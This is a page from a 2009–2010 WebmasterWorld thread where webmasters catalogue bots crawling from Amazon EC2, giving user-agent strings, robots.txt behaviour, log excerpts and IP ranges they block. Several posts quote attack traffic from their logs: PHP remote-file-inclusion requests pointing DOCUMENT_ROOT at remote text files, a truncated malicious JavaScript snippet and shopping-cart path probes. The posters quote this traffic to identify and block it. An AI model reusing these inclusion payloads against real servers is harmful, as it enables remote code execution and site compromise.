homepage Welcome to WebmasterWorld Guest from 54.227.171.163
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

This 278 message thread spans 10 pages: < < 278 ( 1 2 3 [4] 5 6 7 8 9 10 > >     
amazonaws.com plays host to wide variety of bad bots
Most recently seen: Gnomit
Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 3:04 am on Jan 18, 2009 (gmt 0)

ec2-67-202-57-30.compute-1.amazonaws.com
Mozilla/5.0 (compatible; X11; U; Linux i686 (x86_64); en-US; +http://gnomit.com/) Gecko/2008092416 Gnomit/1.0"

- robots.txt? NO
- Uneven apostrophes in UA (only closing)
- site in UA yields this oh-so-descriptive info:

<html>
<head>
</head>
<body>
</body>
</html>

----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you; or newly renamed. Here are the actual UA strings; in no particular order:

NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO

feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO

Twitturly / v0.5
robots.txt? NO

YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO

YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes

Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO

PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES

EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES

Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO

TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO

Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO

Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES

yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO

Mozilla/5.0
robots.txt? NO

Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES

TinEye
robots.txt? NO

Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES

nnn/ttt (n)
robots.txt? YES

AideRSS/1.0 (aiderss.com)
robots.txt? NO

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO

----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO

WebClient
robots.txt? YES

----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:

Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.

 

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 7:31 pm on Nov 17, 2009 (gmt 0)

Many, many AWS-based UAs still hitting home and specific pages. robots.txt? NEVER.

DAILY (multiple times; always HEAD requests):

ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2

ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)

WEEKLY (approx.; always HEAD requests):

ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

(Two days earlier, Netcraft sent its minion...)

lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

dstiles

WebmasterWorld Senior Member dstiles us a WebmasterWorld Top Contributor of All Time 5+ Year Member



 
Msg#: 3828718 posted 10:20 pm on Nov 17, 2009 (gmt 0)

I just dumped the whole 174.129.nnn.nnn block into IIS's Security Deny list - won't ever see it again even in the logs. A /24 of a persistent 75.101 block followed it in and is likely to be extended any day now...

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 11:38 pm on Nov 17, 2009 (gmt 0)

One more for your files, dstiles:)

I forgot to mention this many, many, many times a day pest. No robots.txt, 'natch. GETs, not HEADs:

ec2-67-202-15-174.compute-1.amazonaws.com
Python-urllib/2.6

dstiles

WebmasterWorld Senior Member dstiles us a WebmasterWorld Top Contributor of All Time 5+ Year Member



 
Msg#: 3828718 posted 12:06 am on Nov 18, 2009 (gmt 0)

Only got one hit near that this month (176, not 174) but lots more in the 67.202.nnn.nnn range. Their days may be numbered but I'm interested in seeing what else comes along. :)

I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)

Bewenched

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 6:40 pm on Nov 19, 2009 (gmt 0)

Yup .. had to just block ALL
174.129.x.x

MASSIVE amounts of form submits like 600 in less than one minute.

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 8:01 pm on Nov 19, 2009 (gmt 0)

Amazon's Elastic Compute Cloud (EC2)/AWS hosting gets bigger and biggger and bigggger:

174.129.0.0 - 174.129.255.255
174.129.0.0/16

@Bewenched: Yikes. Were you attacked by a single IP/amazonaws.com Host? If yes, which one, please? Also, was there one particular UA? TIA

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:51 pm on Nov 19, 2009 (gmt 0)

ec2-174-129-75-209.compute-1.amazonaws.com
SheenBot/SheenBot-1.0.0 (Sheen web crawler)

robots.txt? Yes

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 11:00 pm on Nov 19, 2009 (gmt 0)

Two UAs crawling Tweeted URLs:

ec2-174-129-62-166.compute-1.amazonaws.com
Typhoeus - http://github.com/pauldix/typhoeus/tree/master

robots.txt? NO

ec2-75-101-227-191.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.1

robots.txt? NO

keyplyr

WebmasterWorld Senior Member keyplyr us a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



 
Msg#: 3828718 posted 9:11 am on Nov 21, 2009 (gmt 0)

ec2-174-129-225-12.compute-1.amazonaws.com
UA: Who.is Bot
robots.txt: no

hit / and ran

tangor

WebmasterWorld Senior Member tangor us a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



 
Msg#: 3828718 posted 9:46 am on Nov 21, 2009 (gmt 0)

I'm this close to Deny 174.129* that I have to ask (and I ask because this topic thrills me but I have little to zero ambition to learn it fully) are there ANY legit visitors from this domain? So far I've seen none. I lean toward whitelisting (less work) than expending oodles of time in pissant deny because the latter is SO much more work!

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:09 pm on Nov 21, 2009 (gmt 0)

I block by Host (amazonaws) and I've yet to see a single real-person-in-real-time hit from AWS since before I began this thread on Jan. 17, 2009. Rapid-fire assaults increase every week, like this 90-second blitz from a few days ago (partial listing):

[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)

That range, that place, gives irresponsible bot-runners a place to hide and breed.

keyplyr

WebmasterWorld Senior Member keyplyr us a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



 
Msg#: 3828718 posted 11:21 pm on Nov 21, 2009 (gmt 0)

What range does Amazon's A9 search engine crawl from?

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 8:39 am on Nov 22, 2009 (gmt 0)

Good Q. Beats me. Never spotted an A9 hit -- anyone? Then again, it appears A9 is primarily product-oriented now and none of my sites sell stuff. Rather, the majority of my hits from AWS are social network-related.

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 5:23 pm on Nov 22, 2009 (gmt 0)

Alas, even Amazon EC2 (Amazon Elastic Compute Cloud) isn't free of exploit-probers:

ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola

11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/

Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 4:57 am on Nov 24, 2009 (gmt 0)

Yikes. Another exploit this evening:

ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too?;)

---
P.S./FYI

The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):

icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/

87.218.210-nn.q9.net
Java/1.6.0_14

crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)

Who's crawling/exploiting whom?

keyplyr

WebmasterWorld Senior Member keyplyr us a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



 
Msg#: 3828718 posted 8:59 am on Nov 24, 2009 (gmt 0)

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

There's a lot of that coming from various hosts.

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:01 am on Dec 1, 2009 (gmt 0)

ec2-67-202-41-144.compute-1.amazonaws.com
cierzo/Nutch-0.9

robots.txt? Yes

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:33 pm on Dec 3, 2009 (gmt 0)

ec2-75-101-232-27.compute-1.amazonaws.com
MetaURI API +metauri.com

robots.txt? NO

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 1:09 am on Dec 4, 2009 (gmt 0)

ec2-75-101-158-138.compute-1.amazonaws.com
my6sense/1.0

robots.txt? NO

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 2:49 am on Dec 7, 2009 (gmt 0)

Emphasis mine. Running from amazonaws, this is a bot. But it's also a FF add-on, which means, if it alters all FF strings, it'll be iffy distinguishing potential hits from less obvious/notorious server farms.

ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)

robots.txt? NO

dstiles

WebmasterWorld Senior Member dstiles us a WebmasterWorld Top Contributor of All Time 5+ Year Member



 
Msg#: 3828718 posted 8:10 pm on Dec 9, 2009 (gmt 0)

Just to add another reason to block the cloud:

"Zeus crimeware using Amazon's EC2 as command and control server"
(from zdnet security blog)

A few days ago I noted in another thread that I'd seen an AWS IP in the midst of botnet accesses.

keyplyr

WebmasterWorld Senior Member keyplyr us a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



 
Msg#: 3828718 posted 2:00 am on Dec 21, 2009 (gmt 0)

...an AWS IP in the midst of botnet accesses.

In the "midst?" Ha, I looked up "botnet" and expected to see a thumbnail of Amazon EC2:

174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 5:36 pm on Dec 22, 2009 (gmt 0)

ec2-174-129-64-134.compute-1.amazonaws.com
Mozilla/5.0 (compatible; XmarksFetch/1.0; +http://www.xmarks.com/about/crawler; info@xmarks.com)

robots.txt? Yes

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 6:14 pm on Dec 22, 2009 (gmt 0)

Speaking of AWS/EC and botnet-related exploits... Three seconds apart:

.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

Notes:

- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.

- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").

- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --

IP.compute-1(or2,etc).amazonaws.com

-- but this is:

IP.us-west-1.compute.amazonaws.com

There are more variations here [robtex.com]. (I block on amazonaws.com)

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 8:24 pm on Dec 22, 2009 (gmt 0)

Whoa. Another one. Wonder when AWS/EC2 is going to clean up its act?

ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?

Note: .su is the Soviet Union.

(FWIW, I won't keep posting exploit events because this thread's for spider-sitings and the fake UA has been reported.)

dstiles

WebmasterWorld Senior Member dstiles us a WebmasterWorld Top Contributor of All Time 5+ Year Member



 
Msg#: 3828718 posted 3:46 pm on Jan 1, 2010 (gmt 0)

Just found a new (to me) Amazon IP block. Cloud but not labelled AWS.

IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.

Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 4:59 pm on Jan 1, 2010 (gmt 0)

Good spotting, dstiles! Shoot. Cloaked servers now, too -- and w/ a UA related to China via .cn and 163.com, hosts with long histories of nastiness on my sites. In a word: Ugh.

FWIW, here's yet another UA:

ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

robots.txt? NO

dstiles

WebmasterWorld Senior Member dstiles us a WebmasterWorld Top Contributor of All Time 5+ Year Member



 
Msg#: 3828718 posted 11:12 pm on Jan 1, 2010 (gmt 0)

Already got the whole range 174.129.0.0 - 174.129.255.255 blocked! :)

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 10:05 am on Jan 12, 2010 (gmt 0)

No UA at all this time, and only went for favicon.ico:

ec2-75-101-169-108.compute-1.amazonaws.com
-

robots.txt? NO

tangor

WebmasterWorld Senior Member tangor us a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



 
Msg#: 3828718 posted 10:50 am on Jan 12, 2010 (gmt 0)

Pfui...

This has been a very interesting thread... what say you parse it to significance and reduce to the fully skinny? For the kiddies out there yet to ask the query?

More fun: provide ip ranges ala amazonaws.com

Pfui

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3828718 posted 4:08 am on Jan 16, 2010 (gmt 0)

Long story short? Block .amazonaws.com :)

IP range-wise, the IPs are 'in' the Host names.* Now as to how many there are, let alone what they are, I'm sorry but I'll have to leave that compilation as a sweat equity exercise for the bot-curious/obsessed at this time. Suffice it to say that akin to any country -- and numbering more than many countries'! -- Amazon's cloud-related IPs are neither contiguous nor non-expanding.

.
*The second post in the MetaURI [webmasterworld.com] thread shows more detail, including an atypical example of the same UA using the exact same AWS IP over a period of time.

This 278 message thread spans 10 pages: < < 278 ( 1 2 3 [4] 5 6 7 8 9 10 > >
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved